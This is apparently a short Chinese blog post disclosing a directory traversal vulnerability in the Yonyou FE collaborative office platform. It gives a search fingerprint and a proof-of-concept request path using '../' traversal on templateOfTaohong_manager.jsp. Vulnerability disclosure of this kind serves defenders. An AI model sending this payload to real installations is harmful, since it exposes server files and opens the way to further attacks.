Yonyou FE协作办公平台 templateOfTaohong_manager.jsp文件存在目录遍历漏洞,通过漏洞攻击者可以获取目录文件等信息,导致进一步攻击
Yonyou FE协作办公平台
"FE协作"
登录页面
验证POC
/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../
456 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!